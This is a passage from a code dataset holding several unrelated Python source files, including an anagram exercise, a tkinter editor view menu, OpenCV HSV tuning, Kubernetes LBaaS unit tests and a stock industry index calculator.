Also \"aabfffr\" and \"afbfraf\" are anagrams.\n\nSample inputs - Expected outputs\n\"abcd\", \"cdab\" -> True\n\"aabfffr\", \"afbfraf\" -> True\n\"kdkd\", \"dkdr\" -> False\n'''\n\ndef AnagramBloomberg2(a,b):\n\n if ''.join(sorted(a))==''.join(sorted(b)):\n return True\n else:\n return False\ndef AnagramBloomberg1(a,b):\n\n if len(a)!=len(b):\n return False\n else:\n dict={}\n for key in list(a):\n if key in dict.keys():\n dict[key]=dict.get(key)+1\n else:\n dict[key]=1\n for key in list(b):\n if key in dict.keys() and dict.get(key)>0:\n dict[key]=dict.get(key)-1\n else:\n return False\n return True\n\ndef main():\n\n a='abcd'\n b='cdab'\n print(AnagramBloomberg1(a,b))\n print(AnagramBloomberg2(a, b))\n\n a = 'aabfffr'\n b = 'afbfraf'\n print(AnagramBloomberg1(a, b))\n print(AnagramBloomberg2(a, b))\n\n a = 'kdkd'\n b = 'dkdr'\n print(AnagramBloomberg1(a, b))\n print(AnagramBloomberg2(a, b))\n\nif __name__=='__main__':\n main()","sub_path":"python/CodingExercises/Anagram-Bloomberg.py","file_name":"Anagram-Bloomberg.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"449681102","text":"import include\nfrom tkinter import BooleanVar\n\n\nclass Zoom:\n def __init__(self, zoom_label, font):\n self.font = font\n self.zoomed = 0\n self.zoom_count = 100\n self.zoom_label = zoom_label\n\n def zoom_in(self, event=None):\n '''Increase font_size by 1 upto 50 times from default_size'''\n\n if self.zoom_count != 500: # 500% is the maximum perecentage to zoom-in\n self.zoomed += 1\n font_size = self.font['size'] + 1\n self.font.configure(size=font_size)\n\n self.zoom_count += 10\n self.zoom_label['text'] = f'{self.zoom_count}%'\n self.save_zoomed(self.zoomed)\n\n def zoom_out(self, event=None):\n '''Decrease font_size by 1 upto 10 times from default_size'''\n\n if self.zoom_count != 10: # 10% is the minimum percentage to zoom-out\n self.zoomed -= 1\n font_size = self.font['size'] - 1\n\n if font_size != 0:\n self.font.configure(size=font_size)\n\n self.zoom_count -= 10\n self.zoom_label['text'] = f'{self.zoom_count}%'\n self.save_zoomed(self.zoomed)\n\n def default_zoom(self, event=None):\n '''Change zoomed_in and zoomed_out fonts to the default_size'''\n\n self.zoom_count = 100\n self.zoom_label['text'] = '100%'\n self.save_zoomed()\n\n def save_zoomed(self, zoomed=None):\n '''Save the amount of zoom in and zoom out to the json file'''\n\n font_details = include.get_font_details()\n\n if zoomed is None: # This means remove zoomed amount\n self.zoomed = 0\n\n if 'Zoomed' in font_details:\n font_details.pop('Zoomed')\n\n self.font.configure(family=font_details['Font Family'], size=font_details['Font Size'])\n\n else:\n font_details['Zoomed'] = self.zoomed\n\n include.save_font_details(font_details)\n\n\nclass LineNumber:\n '''Update line numbers'''\n\n def __init__(self, master, line_canvas, text_widget, font):\n self.font = font\n self.master = master\n self.line_canvas = line_canvas\n self.text_widget = text_widget\n\n def redraw(self):\n '''Draw line number when the cursor goes to new line'''\n\n self.line_canvas.delete(\"all\")\n i = self.text_widget.index(\"@0,0\")\n\n while True:\n dline = self.text_widget.dlineinfo(i)\n\n if dline is None:\n break\n\n y = dline[1]\n linenum = str(i).split(\".\")[0]\n\n font = (self.font['family'], self.font['size'])\n self.line_canvas.create_text(2, y, anchor=\"nw\", text=linenum, font=font)\n i = self.text_widget.index(\"%s+1line\" % i)\n\n self.master.after(100, 
self.redraw)\n\n\nclass View:\n def __init__(self, master, text_widget, text_widget_frame, canvas_frame, line_canvas, status_bar_frame, zoom_label, font):\n self.master = master\n self.line_canvas = line_canvas\n self.text_widget = text_widget\n self.canvas_frame = canvas_frame\n self.zoom = Zoom(zoom_label, font)\n self.status_bar_frame = status_bar_frame\n self.text_widget_frame = text_widget_frame\n self.line_number = LineNumber(master, line_canvas, text_widget, font)\n\n self.show_status_bar = BooleanVar(value=True)\n self.fullscreen_var = BooleanVar(value=False)\n self.line_number_var = BooleanVar(value=False)\n\n def zoom_in(self, evet=None):\n self.zoom.zoom_in()\n\n def zoom_out(self, evet=None):\n self.zoom.zoom_out()\n\n def default_zoom(self, evet=None):\n self.zoom.default_zoom()\n\n def toggle_statusbar(self, event=None):\n '''Show or hide status-bar when user clicks Status-bar sub-menu in\n View menu or when user presses Alt+S'''\n\n if self.show_status_bar:\n self.show_status_bar = False\n self.status_bar_frame.grid_forget()\n\n else:\n self.show_status_bar = True\n self.status_bar_frame.grid(row=2, column=0, sticky='e')\n\n def set_full_screen(self, event=None):\n '''Change window to full-screen when user user clicks FullScreen\n sub-menu in View-Menu or when presses F11'''\n\n state = False if self.master.wm_attributes('-fullscreen') else True\n self.master.wm_attributes('-fullscreen', state)\n\n def toggle_linenumber(self, event=None):\n '''Hide and show line_number'''\n\n if self.line_number_var:\n self.line_number_var = False\n self.canvas_frame.pack_forget()\n\n else:\n self.line_number_var = True\n self.canvas_frame.pack(side='left', fill='y')\n self.text_widget_frame.pack(side='right', fill='both', expand=True)\n self.line_number.redraw()\n self.line_canvas.configure(scrollregion=self.line_canvas.bbox('all'))\n","sub_path":"PROJECT GUIs/ZPAD/view_menu.py","file_name":"view_menu.py","file_ext":"py","file_size_in_byte":4886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384267575","text":"from selenium.webdriver.common.by import By\n\n\nclass Class_menu_cierre_edicion:\n\n def __init__(self, myDriver):\n self.driver = myDriver\n self.menu_general_button = (By.ID, \"menu-toggle-2\") # MENU GENERAL\n self.menu_cierre_edicion = (By.XPATH, '//*[@id=\"menu\"]/li[2]/a') # MENU CIERRE DE EDICION\n self.option_menu_ciere_edicion = (By.XPATH, '//*[@id=\"orden_armado_li\"]/a') # OPCION MENU CIERRE DE EDICION","sub_path":"Pages_Objects/Funciones_Comunes/Menus/Menu_Cierre_Edicion.py","file_name":"Menu_Cierre_Edicion.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"636903428","text":"import cv2\nimport numpy as np\nimport sys\nimport time\n\ndef nothing(x):\n pass\nfps_time = time.time()\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 640)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\ncv2.namedWindow('hsv_tune',cv2.WINDOW_AUTOSIZE)\ncv2.resizeWindow(\"hsv_tune\", 640, 480)\ncv2.createTrackbar('hl', 'hsv_tune', 0, 179, nothing)\ncv2.createTrackbar('hu', 'hsv_tune', 179, 179, nothing)\ncv2.createTrackbar('sl', 'hsv_tune', 0, 255, nothing)\ncv2.createTrackbar('su', 'hsv_tune', 255, 255, nothing)\ncv2.createTrackbar('vl', 'hsv_tune', 0, 255, nothing)\ncv2.createTrackbar('vu', 'hsv_tune', 255, 255, nothing)\nwhile(True):\n frame = cv2.imread(r'..\\img\\led18.jpg')\n #ret , frame = cap.read()\n \"\"\"\n if 
time.time()-fps_time>0:\n fps = int(1/(time.time()-fps_time))\n fps_time = time.time()\n else:\n\t\tfps=0\n #fps = cv2.cv.CV_CAP_PROP_FPS\n print 'FPS = ' , fps\n \"\"\"\n h, s, v = 100, 100, 100\n hl = cv2.getTrackbarPos('hl', 'hsv_tune')\n hu = cv2.getTrackbarPos('hu', 'hsv_tune')\n sl = cv2.getTrackbarPos('sl', 'hsv_tune')\n su = cv2.getTrackbarPos('su', 'hsv_tune')\n vl = cv2.getTrackbarPos('vl', 'hsv_tune')\n vu = cv2.getTrackbarPos('vu', 'hsv_tune')\n kernel = np.ones((5,5),np.uint8)\n \n #blur = frame\n blur = cv2.GaussianBlur(frame,(5,5),0)\n hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)\n lower = np.array([hl, sl, vl])\n upper = np.array([hu, su, vu])\n\n mask = cv2.inRange(hsv, lower, upper)\n #blur = cv2.medianBlur(mask,5)\n mask = cv2.dilate(mask, kernel, iterations=3)\n result = cv2.bitwise_and(blur, blur, mask=mask)\n cv2.imshow(\"hsv_tune\", result)\n if cv2.waitKey(1) & 0xFF == ord(\"q\"):\n cap.release()\n break\n\ncv2.destroyAllWindows()\n","sub_path":"Test/Script/hsv.py","file_name":"hsv.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"612774329","text":"import logging\nimport pickle\n\nimport click\nfrom pymongo.errors import WriteError as MongoWriteError\nfrom mongo_adapter import get_client\n\n\nfrom mutacc.parse.path_parse import make_dir\nfrom mutacc.parse.yaml_parse import yaml_parse\nfrom mutacc.builds.build_case import CompleteCase\nfrom mutacc.mutaccDB.insert import insert_entire_case\n\n\nLOG = logging.getLogger(__name__)\n\n@click.command('extract')\n@click.option('-c', '--case',\n type = click.Path(exists = True),\n help = \" .yaml file for case. See README.md for information on what to include or example .yaml file in data/data.yaml\")\n@click.option('--padding', default = 300)\n@click.option('--mutacc-dir', type=click.Path())\n@click.option('-o', '--out-dir', type=click.Path())\n@click.pass_context\ndef extract_command(context, case, padding, mutacc_dir, out_dir):\n\n \"\"\"\n extract reads from case\n \"\"\"\n LOG.info(\"extracting reads from case {0}\".format(case))\n\n mutacc_dir = mutacc_dir or context.obj.get('mutacc_dir')\n mutacc_dir = make_dir(mutacc_dir)\n\n case = yaml_parse(case)\n\n case = CompleteCase(case)\n\n case.get_variants(padding = padding)\n case.get_samples(mutacc_dir)\n case.get_case()\n\n out_dir = out_dir or context.obj.get('case_dir')\n out_dir = make_dir(out_dir)\n\n pickle_file = out_dir.joinpath(case.case_id + \"_case\"+ \".mutacc\")\n\n #Serialize case object to file for later import\n with open(pickle_file, \"wb\") as pickle_handle:\n\n pickle.dump(case, pickle_handle)\n\n LOG.info(\"to import reads into mutaccDB, do: \\n mutacc db import {}\".format(\n pickle_file\n )\n )\n","sub_path":"mutacc/cli/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"536940440","text":"from django.conf.urls import patterns, url\nfrom django.core.urlresolvers import reverse_lazy\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.views.generic import RedirectView\n\n\nurlpatterns = patterns('rhizome.journal.views',\n url(r'^$',\n view='index',\n name='blog_index'\n ),\n\n url(r'^tags/(?P[-.\\w]+)/$',\n view='tag_index',\n name='blog_tag_index'\n ),\n\n url(r'^tag/(?P[-.\\w]+)/$',\n view='tag_index',\n name='blog_tag_index'\n ),\n url(r'^tags/$', 
RedirectView.as_view(url=reverse_lazy('blog_index'))),\n # url(r'^tag.php',\n # view='old_tag_forward',\n # name='old_tag_forward'\n # ),\n\n url(r'^artist-profiles/$',\n view='artist_profiles',\n name='blog_artist_profiles'\n ),\n\n url(r'^(?P\\d{4})/(?P\\w{3})/(?P\\d{1,2})/(?P[-\\w]+)/$',\n view='detail',\n name='blog_detail'\n ),\n\n url(r'^(?P\\d+)/$',\n view='detail_forward',\n name='blog_detail_forward'\n ),\n\n url(r'^(?P\\d+)/save/$',\n view='save',\n name='blog_save'\n )\n)\n","sub_path":"rhizome/journal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"40700971","text":"# Copyright (c) 2016 Mirantis, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport mock\nimport os_vif.objects.network as osv_network\nimport os_vif.objects.subnet as osv_subnet\n\nfrom kuryr_kubernetes.controller.drivers import base as drv_base\nfrom kuryr_kubernetes.controller.handlers import lbaas as h_lbaas\nfrom kuryr_kubernetes import exceptions as k_exc\nfrom kuryr_kubernetes.objects import lbaas as obj_lbaas\nfrom kuryr_kubernetes.tests import base as test_base\n\n\nclass TestLBaaSSpecHandler(test_base.TestCase):\n\n @mock.patch('kuryr_kubernetes.controller.drivers.base'\n '.ServiceSecurityGroupsDriver.get_instance')\n @mock.patch('kuryr_kubernetes.controller.drivers.base'\n '.ServiceSubnetsDriver.get_instance')\n @mock.patch('kuryr_kubernetes.controller.drivers.base'\n '.ServiceProjectDriver.get_instance')\n def test_init(self, m_get_drv_project, m_get_drv_subnets, m_get_drv_sg):\n m_get_drv_project.return_value = mock.sentinel.drv_project\n m_get_drv_subnets.return_value = mock.sentinel.drv_subnets\n m_get_drv_sg.return_value = mock.sentinel.drv_sg\n\n handler = h_lbaas.LBaaSSpecHandler()\n\n self.assertEqual(mock.sentinel.drv_project, handler._drv_project)\n self.assertEqual(mock.sentinel.drv_subnets, handler._drv_subnets)\n self.assertEqual(mock.sentinel.drv_sg, handler._drv_sg)\n\n def test_on_present(self):\n svc_event = mock.sentinel.svc_event\n old_spec = mock.sentinel.old_spec\n new_spec = mock.sentinel.new_spec\n\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_handler._get_lbaas_spec.return_value = old_spec\n m_handler._has_lbaas_spec_changes.return_value = True\n m_handler._generate_lbaas_spec.return_value = new_spec\n\n h_lbaas.LBaaSSpecHandler.on_present(m_handler, svc_event)\n\n m_handler._get_lbaas_spec.assert_called_once_with(svc_event)\n m_handler._has_lbaas_spec_changes.assert_called_once_with(svc_event,\n old_spec)\n m_handler._generate_lbaas_spec.assert_called_once_with(svc_event)\n m_handler._set_lbaas_spec.assert_called_once_with(svc_event, new_spec)\n\n def test_on_present_no_changes(self):\n svc_event = mock.sentinel.svc_event\n old_spec = mock.sentinel.old_spec\n\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_handler._get_lbaas_spec.return_value = old_spec\n 
m_handler._has_lbaas_spec_changes.return_value = False\n\n h_lbaas.LBaaSSpecHandler.on_present(m_handler, svc_event)\n\n m_handler._get_lbaas_spec.assert_called_once_with(svc_event)\n m_handler._has_lbaas_spec_changes.assert_called_once_with(svc_event,\n old_spec)\n m_handler._generate_lbaas_spec.assert_not_called()\n m_handler._set_lbaas_spec.assert_not_called()\n\n def test_get_service_ip(self):\n svc_body = {'spec': {'type': 'ClusterIP',\n 'clusterIP': mock.sentinel.cluster_ip}}\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n\n ret = h_lbaas.LBaaSSpecHandler._get_service_ip(m_handler, svc_body)\n self.assertEqual(mock.sentinel.cluster_ip, ret)\n\n def test_get_service_ip_not_cluster_ip(self):\n svc_body = {'spec': {'type': 'notClusterIP',\n 'clusterIP': mock.sentinel.cluster_ip}}\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n\n ret = h_lbaas.LBaaSSpecHandler._get_service_ip(m_handler, svc_body)\n self.assertIsNone(ret)\n\n def _make_test_net_obj(self, cidr_list):\n subnets = [osv_subnet.Subnet(cidr=cidr) for cidr in cidr_list]\n subnets_list = osv_subnet.SubnetList(objects=subnets)\n return osv_network.Network(subnets=subnets_list)\n\n def test_get_subnet_id(self):\n test_ip = '1.2.3.4'\n test_cidr = '1.2.3.0/24'\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_drv_subnets = mock.Mock(spec=drv_base.ServiceSubnetsDriver)\n m_handler._drv_subnets = m_drv_subnets\n m_drv_subnets.get_subnets.return_value = {\n mock.sentinel.subnet_id: self._make_test_net_obj([test_cidr])\n }\n\n self.assertEqual(mock.sentinel.subnet_id,\n h_lbaas.LBaaSSpecHandler._get_subnet_id(\n m_handler,\n mock.sentinel.service,\n mock.sentinel.project_id,\n test_ip))\n m_drv_subnets.get_subnets.assert_called_once_with(\n mock.sentinel.service, mock.sentinel.project_id)\n\n def test_get_subnet_id_invalid(self):\n test_ip = '1.2.3.4'\n test_cidr = '3.2.1.0/24'\n m_service = mock.MagicMock()\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_drv_subnets = mock.Mock(spec=drv_base.ServiceSubnetsDriver)\n m_handler._drv_subnets = m_drv_subnets\n m_drv_subnets.get_subnets.return_value = {\n mock.sentinel.subnet_id: self._make_test_net_obj([test_cidr])\n }\n\n self.assertRaises(k_exc.IntegrityError,\n h_lbaas.LBaaSSpecHandler._get_subnet_id,\n m_handler,\n m_service,\n mock.sentinel.project_id,\n test_ip)\n\n def test_generate_lbaas_spec(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n\n service = mock.sentinel.service\n project_id = mock.sentinel.project_id\n ip = mock.sentinel.ip\n subnet_id = mock.sentinel.subnet_id\n ports = mock.sentinel.ports\n sg_ids = mock.sentinel.sg_ids\n\n m_drv_project = mock.Mock()\n m_drv_project.get_project.return_value = project_id\n m_drv_sg = mock.Mock()\n m_drv_sg.get_security_groups.return_value = sg_ids\n m_handler._drv_project = m_drv_project\n m_handler._drv_sg = m_drv_sg\n m_handler._get_service_ip.return_value = ip\n m_handler._get_subnet_id.return_value = subnet_id\n m_handler._generate_lbaas_port_specs.return_value = ports\n\n spec_ctor_path = 'kuryr_kubernetes.objects.lbaas.LBaaSServiceSpec'\n with mock.patch(spec_ctor_path) as m_spec_ctor:\n m_spec_ctor.return_value = mock.sentinel.ret_obj\n ret_obj = h_lbaas.LBaaSSpecHandler._generate_lbaas_spec(\n m_handler, service)\n self.assertEqual(mock.sentinel.ret_obj, ret_obj)\n m_spec_ctor.assert_called_once_with(\n ip=ip,\n project_id=project_id,\n subnet_id=subnet_id,\n ports=ports,\n security_groups_ids=sg_ids)\n\n m_drv_project.get_project.assert_called_once_with(service)\n 
m_handler._get_service_ip.assert_called_once_with(service)\n m_handler._get_subnet_id.assert_called_once_with(\n service, project_id, ip)\n m_handler._generate_lbaas_port_specs.assert_called_once_with(service)\n m_drv_sg.get_security_groups.assert_called_once_with(\n service, project_id)\n\n def test_has_lbaas_spec_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n service = mock.sentinel.service\n lbaas_spec = mock.sentinel.lbaas_spec\n\n for has_ip_changes in (True, False):\n for has_port_changes in (True, False):\n m_handler._has_ip_changes.return_value = has_ip_changes\n m_handler._has_port_changes.return_value = has_port_changes\n ret = h_lbaas.LBaaSSpecHandler._has_lbaas_spec_changes(\n m_handler, service, lbaas_spec)\n self.assertEqual(has_ip_changes or has_port_changes, ret)\n\n def test_get_service_ports(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n service = {'spec': {'ports': [\n {'port': 1},\n {'port': 2, 'name': 'X', 'protocol': 'UDP'}\n ]}}\n expected_ret = [\n {'port': 1, 'name': None, 'protocol': 'TCP'},\n {'port': 2, 'name': 'X', 'protocol': 'UDP'}]\n\n ret = h_lbaas.LBaaSSpecHandler._get_service_ports(m_handler, service)\n self.assertEqual(expected_ret, ret)\n\n def test_has_port_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ports.return_value = [\n {'port': 1, 'name': 'X', 'protocol': 'TCP'},\n ]\n\n m_lbaas_spec = mock.MagicMock()\n m_lbaas_spec.ports = [\n obj_lbaas.LBaaSPortSpec(name='X', protocol='TCP', port=1),\n obj_lbaas.LBaaSPortSpec(name='Y', protocol='TCP', port=2),\n ]\n\n ret = h_lbaas.LBaaSSpecHandler._has_port_changes(\n m_handler, m_service, m_lbaas_spec)\n\n self.assertTrue(ret)\n\n def test_has_port_changes__no_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ports.return_value = [\n {'port': 1, 'name': 'X', 'protocol': 'TCP'},\n {'port': 2, 'name': 'Y', 'protocol': 'TCP'}\n ]\n\n m_lbaas_spec = mock.MagicMock()\n m_lbaas_spec.ports = [\n obj_lbaas.LBaaSPortSpec(name='X', protocol='TCP', port=1),\n obj_lbaas.LBaaSPortSpec(name='Y', protocol='TCP', port=2),\n ]\n\n ret = h_lbaas.LBaaSSpecHandler._has_port_changes(\n m_handler, m_service, m_lbaas_spec)\n\n self.assertFalse(ret)\n\n def test_has_ip_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ip.return_value = '1.1.1.1'\n m_lbaas_spec = mock.MagicMock()\n m_lbaas_spec.ip.__str__.return_value = '2.2.2.2'\n\n ret = h_lbaas.LBaaSSpecHandler._has_ip_changes(\n m_handler, m_service, m_lbaas_spec)\n self.assertTrue(ret)\n\n def test_has_ip_changes__no_changes(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ip.return_value = '1.1.1.1'\n m_lbaas_spec = mock.MagicMock()\n m_lbaas_spec.ip.__str__.return_value = '1.1.1.1'\n\n ret = h_lbaas.LBaaSSpecHandler._has_ip_changes(\n m_handler, m_service, m_lbaas_spec)\n self.assertFalse(ret)\n\n def test_has_ip_changes__no_spec(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n m_handler._get_service_ip.return_value = '1.1.1.1'\n m_lbaas_spec = None\n\n ret = h_lbaas.LBaaSSpecHandler._has_ip_changes(\n m_handler, m_service, m_lbaas_spec)\n self.assertTrue(ret)\n\n def test_has_ip_changes__no_nothing(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_service = mock.MagicMock()\n 
m_handler._get_service_ip.return_value = None\n m_lbaas_spec = None\n\n ret = h_lbaas.LBaaSSpecHandler._has_ip_changes(\n m_handler, m_service, m_lbaas_spec)\n self.assertFalse(ret)\n\n def test_generate_lbaas_port_specs(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n m_handler._get_service_ports.return_value = [\n {'port': 1, 'name': 'X', 'protocol': 'TCP'},\n {'port': 2, 'name': 'Y', 'protocol': 'TCP'}\n ]\n expected_ports = [\n obj_lbaas.LBaaSPortSpec(name='X', protocol='TCP', port=1),\n obj_lbaas.LBaaSPortSpec(name='Y', protocol='TCP', port=2),\n ]\n\n ret = h_lbaas.LBaaSSpecHandler._generate_lbaas_port_specs(\n m_handler, mock.sentinel.service)\n self.assertEqual(expected_ports, ret)\n m_handler._get_service_ports.assert_called_once_with(\n mock.sentinel.service)\n\n def test_get_endpoints_link(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n service = {'metadata': {\n 'selfLink': \"/api/v1/namespaces/default/services/test\"}}\n ret = h_lbaas.LBaaSSpecHandler._get_endpoints_link(m_handler, service)\n expected_link = \"/api/v1/namespaces/default/endpoints/test\"\n self.assertEqual(expected_link, ret)\n\n def test_get_endpoints_link__integrity_error(self):\n m_handler = mock.Mock(spec=h_lbaas.LBaaSSpecHandler)\n service = {'metadata': {\n 'selfLink': \"/api/v1/namespaces/default/not-services/test\"}}\n self.assertRaises(k_exc.IntegrityError,\n h_lbaas.LBaaSSpecHandler._get_endpoints_link,\n m_handler, service)\n\n def test_set_lbaas_spec(self):\n self.skipTest(\"skipping until generalised annotation handling is \"\n \"implemented\")\n\n def test_get_lbaas_spec(self):\n self.skipTest(\"skipping until generalised annotation handling is \"\n \"implemented\")\n","sub_path":"kuryr_kubernetes/tests/unit/controller/handlers/test_lbaas.py","file_name":"test_lbaas.py","file_ext":"py","file_size_in_byte":13592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"111846429","text":"from sqlalchemy import create_engine\nfrom datetime import datetime\nfrom Utils.DBOperation import getTradeDates, getDataFromSQL, getIncrmDataFromSQL, writeDB, checkIfIncre\nfrom Utils.DB_config import ConfigQuant\nfrom Utils.Algorithms import calWeightedSumIndexQuote\n\nConfigIndustry = {\n 'tableName':'STOCK_INDUSTRY',\n 'code': 'code',\n 'date': 'date',\n 'industry': 'industry',\n 'time_stamp': 'time_stamp'\n}\n\nConQuote ={\n 'tableName': 'STOCK_FORWARD_ADJ_QUOTE',\n 'code': 'code',\n 'date': 'date',\n 'fields': ['open', 'high', 'low', 'close', 'volume', 'amount', 'turnover'],\n 'time_stamp': 'time_stamp'\n}\n\nConWeights = {\n 'tableName': 'STOCK_FUNDAMENTAL_BASIC',\n 'code': 'code',\n 'date': 'date',\n 'weight': 'FREE_MRK_CAP',\n 'time_stamp': 'time_stamp'\n}\n\ntargetTableName = 'INDUSTRY_INDEX_FORWARD_ADJ_QUOTE'\ntargetDateField = 'date'\ntargetTimeStampField = 'time_stamp'\n\ndef calFullIndustry(db_config, con_industry, con_quote, con_weights, chunk_size, start_date = '2007-01-01'):\n # create sql engine\n my_engine = create_engine('mysql+pymysql://{user}:{password}@{host}/{db}?charset={charset}'.format(**db_config))\n\n # get total trade dates\n trade_dates = getTradeDates(my_engine, con_quote['date'], con_quote['tableName'], start_date)\n\n # read and process data by trade dates\n quote_fields = list(map(lambda x: '`%s`' % x, con_quote['fields']))\n quote_fields = ','.join(quote_fields)\n write_sql_method = 'replace'\n for i in range(int(trade_dates.size / chunk_size) + 1):\n tmp_trade_dates = trade_dates[i*chunk_size : 
(i+1)*chunk_size]\n tmp_trade_dates = list(map(lambda x: \"'%s'\" % x, tmp_trade_dates))\n date_range = ','.join(tmp_trade_dates)\n\n # get quote data\n basic_data = getDataFromSQL(my_engine, con_quote['date'], con_quote['code'], quote_fields,\n con_quote['tableName'], date_range)\n # get weights\n weight_field = '`%s`' % con_weights['weight']\n weights = getDataFromSQL(my_engine, con_weights['date'], con_weights['code'], weight_field,\n con_weights['tableName'], date_range)\n weights = weights.rename(columns={con_weights['weight']: 'weight'})\n\n # get industry\n industry_field = '`%s`' % con_industry['industry']\n industry = getDataFromSQL(my_engine, con_industry['date'], con_weights['code'], industry_field,\n con_industry['tableName'], date_range)\n industry = industry.rename(columns={con_industry['industry']: 'industry'})\n # tot_ind = industry['industry'].unique()\n\n basic_data = basic_data.merge(weights, on=['date', 'code'], how='inner')\n basic_data = basic_data.merge(industry, on=['date', 'code'], how='inner')\n\n # calculate index quote\n industry_index_quote = calWeightedSumIndexQuote(basic_data, con_quote['fields'], 'date', 'industry', 'weight')\n\n # add timestamp\n industry_index_quote[targetTimeStampField] = datetime.now()\n\n # dump data to sql\n writeDB(targetTableName, industry_index_quote, db_config, write_sql_method)\n write_sql_method = 'append'\n\n\ndef calIncrmIndustry(db_config, con_industry, con_quote, con_weights, chunk_size, start_date = '2007-01-01'):\n # create sql engine\n my_engine = create_engine('mysql+pymysql://{user}:{password}@{host}/{db}?charset={charset}'.format(**db_config))\n\n # incremtental to database\n write_sql_method = 'append'\n\n # get quote data (trim by timestamp)\n quote_fields = list(map(lambda x: '`%s`' % x, con_quote['fields']))\n quote_fields = ','.join(quote_fields)\n basic_data = getIncrmDataFromSQL(my_engine, con_quote['date'], con_quote['code'], quote_fields,\n con_quote['tableName'], targetTableName, con_quote['date'], targetDateField)\n\n # already the latest data\n if basic_data.empty:\n return\n\n # get weights (trim by timestamp)\n weight_field = '`%s`' % con_weights['weight']\n weights = getIncrmDataFromSQL(my_engine, con_weights['date'], con_weights['code'], weight_field,\n con_weights['tableName'], targetTableName, con_weights['date'], targetDateField)\n weights = weights.rename(columns={con_weights['weight']: 'weight'})\n\n # get industry (trim by timestamp)\n ind_field = '`%s`' % con_industry['industry']\n industry = getIncrmDataFromSQL(my_engine, con_industry['date'], con_weights['code'], ind_field,\n con_industry['tableName'], targetTableName, con_industry['date'], targetDateField)\n industry = industry.rename(columns={con_industry['industry']: 'industry'})\n\n basic_data = basic_data.merge(weights, on=['date', 'code'], how='inner')\n basic_data = basic_data.merge(industry, on=['date', 'code'], how='inner')\n\n # calculate index quote\n industry_index_quote = calWeightedSumIndexQuote(basic_data, con_quote['fields'], 'date', 'industry', 'weight')\n\n # add timestamp\n industry_index_quote[targetTimeStampField] = datetime.now()\n\n # dump data to sql1\n writeDB(targetTableName, industry_index_quote, db_config, write_sql_method)\n\ndef airflowCallable():\n start_date = '2007-01-01'\n chunk_size = 10\n\n calIncrmIndustry(ConfigQuant, ConfigIndustry, ConQuote, ConWeights, chunk_size, start_date)\n\nif __name__ == '__main__':\n # start_date = '2007-01-01'\n # chunk_size = 10\n #\n # is_full, last_record_date, start_fetch_date 
= checkIfIncre(ConfigQuant, ConQuote['tableName'],\n # targetTableName, ConQuote['date'], [0], '', False)\n #\n # # *********** sw index quote is avaliable, try to use them directly instead of sum by weights\n # if is_full == 1:\n # calFullIndustry(ConfigQuant, ConfigIndustry, ConQuote, ConWeights, chunk_size, start_date)\n # elif is_full == 0:\n # calIncrmIndustry(ConfigQuant, ConfigIndustry, ConQuote, ConWeights, chunk_size, start_date)\n # else:\n # pass\n\n airflowCallable()","sub_path":"Basic/calForwardAdjIndustryIndex.py","file_name":"calForwardAdjIndustryIndex.py","file_ext":"py","file_size_in_byte":6083,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"178968472","text":"from user_interface.coordinates import EnemyCords\n\n\nclass EnemyMonitor(object):\n def __init__(self):\n self.coordinates = EnemyCords()\n self.current_enemies = []\n self.enemy_count = 0\n\n def get_enemies(self, image):\n current_enemies = []\n for enemy in self.coordinates.enemies:\n pixel = 